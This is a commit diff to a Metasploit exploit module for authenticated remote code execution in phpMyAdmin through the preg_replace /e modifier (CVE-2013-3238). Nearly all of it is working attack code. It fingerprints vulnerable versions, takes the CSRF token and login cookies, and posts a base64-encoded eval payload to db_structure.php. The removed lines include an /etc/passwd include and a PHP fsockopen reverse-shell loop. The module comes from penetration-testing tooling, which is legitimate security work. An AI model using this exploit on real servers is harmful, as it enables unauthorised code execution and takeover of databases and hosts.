Final tidyup

modules/exploits/multi/php/phpmyadmin_preg_replace.rb

@@ -11,49 +11,45 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::Remote::HttpServer
-	include Msf::Exploit::PhpEXE
 
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'		 => 'PhpMyAdmin Authenticated Remote Code Execution via preg_replace()',
 			'Description'	 => %q{
-					This module exploits a vulnerability in PhpMyAdmin's setup
+					This module exploits a PREG_REPLACE EVAL vulnerability in PhpMyAdmin's
+					replace_prefix_tbl in libraries/mult_submits.inc.php via db_settings.php
 			},
 			'Author'	 =>
 				[
 					'Janek "waraxe" Vind', # Discovery
-					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'     # metasploit module
+					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
 				],
 			'License'	 => MSF_LICENSE,
 			'References'	 =>
 				[
-					[ 'CVE', '2009-1151' ],
-					[ 'OSVDB', '53076' ],
-					[ 'EDB', '8921' ],
-					[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php' ],
-					[ 'URL', 'http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/' ]
+					[ 'CVE', '2013-3238' ],
+					[ 'PMASA', '2013-2'],
+					[ 'waraxe', '2013-SA#103' ],
+					[ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
 				],
 			'Privileged'	 => false,
 			'Platform'	 => ['php'],
 			'Arch'		 => ARCH_PHP,
 			'Payload'	 =>
 				{
-					'Space'       => 4000, # unlimited really since our shellcode gets written to a file
 					'DisableNops' => true,
-					# No filtering whatsoever, so no badchars
-					'Compat'      =>
-						{
-							'ConnectionType' => 'find',
-						},
-					'Keys'	      => ['php'],
+					'Compat' => { 'ConnectionType' => 'find' }
+				},
+			'DefaultOptions'  =>
+				{
+					'InitialAutoRunScript' => 'migrate -f'
 				},
 			'Targets'	 =>
 				[
-					[ 'Automatic (phpMyAdmin 4.0.0-RC2 and 3.5.8)', { } ],
+					[ 'Automatic', { } ],
 				],
 			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'Apr 26 2013'))
+			'DisclosureDate' => 'Apr 25 2013'))
 
 		register_options(
 			[
@@ -68,19 +64,45 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		path = uri('/js/messages.php')
-		res = send_request_cgi({ 'uri' => path })
+		begin
+			res = send_request_cgi({ 'uri' => uri('/js/messages.php') })
+		rescue
+			print_error("Unable to connect to server.")
+			return CheckCode::Unknown
+		end
 
-		return CheckCode::Unknown if res.nil?
+		if res.code != 200
+			print_error("Unable to query /js/messages.php")
+			return CheckCode::Unknown
+		end
 
-		if res.body =~ /pmaversion = '3\.5\.8'/
-			return CheckCode::Vulnerable
+		if res.body =~ /pmaversion = '(.*)';/
+			print_status("Server version: #{$1}")
+			case $1.downcase
+				when '3.5.8.1', '4.0.0-rc3'
+					return CheckCode::Safe
+				when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2'
+					return CheckCode::Vulnerable
+				else
+					if $1.starts_with? '3.5.'
+						return CheckCode::Vulnerable
+					end
+
+					return CheckCode::Unknown
+			end
 		end
 	end
 
 	def exploit
-		cookie_names = ['phpMyAdmin', 'pma_mcrypt_iv', 'pmaUser-1', 'pmaPass-1', 'pma_lang', 'pma_collation_connection']
-		# First, grab the CSRF token
+		cookie_names = [
+			'phpMyAdmin',
+			'pma_mcrypt_iv',
+			'pmaUser-1',
+			'pmaPass-1',
+			'pma_lang',
+			'pma_collation_connection'
+		]
+
 		print_status("Grabbing CSRF token")
 		response = send_request_cgi({ 'uri' => uri})
 		if response.nil?
@@ -125,49 +147,28 @@ class Metasploit3 < Msf::Exploit::Remote
 			cookie << login.get_cookie(name) << " "
 		end
 
-		db_enum = send_request_cgi({
-			'uri' =>  uri('navigation.php'),
-			'cookie' => cookie,
-			'vars_get' => { 'token' => token },
-		})
-
-		dbs = db_enum.body.scan(/index\.php\?db=(.*)&/).flatten
-		start_service()
-		print_status("Sending request")
-		pay = Rex::Text.uri_encode(payload.encoded.gsub("\t","").gsub("\n",""))
-		pay = "include('../../../../../etc/passwd');"
-		#pay = "print('hello') print 'you'; $ip_addr='1'; print 'hello';"
-#		pay = Rex::Text.uri_encode('print "test";$s=fsockopen("ssl://",4444);while(!feof($s)){exec(fgets($s),$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);};print "test";')
-		p pay
+		db = rand_text_alpha(3+rand(3))
+		pay = Rex::Text.encode_base64(payload.encoded)
 		evil = "query_type=replace_prefix_tbl"
-		evil << "&reload=0"
-		evil << "&db=#{dbs[0]}"
-		evil << "&selected%5B0%5D=test"
+		evil << "&db=#{db}"
+		evil << "&selected%5B0%5D=#{db}"
 		evil << "&token=#{token}"
 		evil << "&from_prefix=%2Fe%00"
-		evil << "&to_prefix=#{pay}"
+		evil << "&to_prefix=eval(base64_decode('#{pay}'))"
 		evil << "&mult_btn=Yes"
 
-		response = send_request_raw({
+		print_status("Sending exploit payload")
+		exploit_result = send_request_raw({
 			'uri'	  => uri('db_structure.php'),
 			'method'  => 'POST',
-			'data' => evil,
+			'data'	  => evil,
 			'cookie'  => cookie,
 			'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }
-		})
+		},2)
 
-		p response.body[0..100]
-		if response.body =~ /test1234/
-			print_good("win")
+		if exploit_result
+			print_error("Response retrieved from server, exploit failed.")
 		end
-
-		sleep(30)
-
-	end
-
-	def on_request_uri(cli, req)
-		php = "<?php #{payload.encoded} ?>"
-		send_response(cli, "<?php print 'test1234'; ?>")
 	end
 end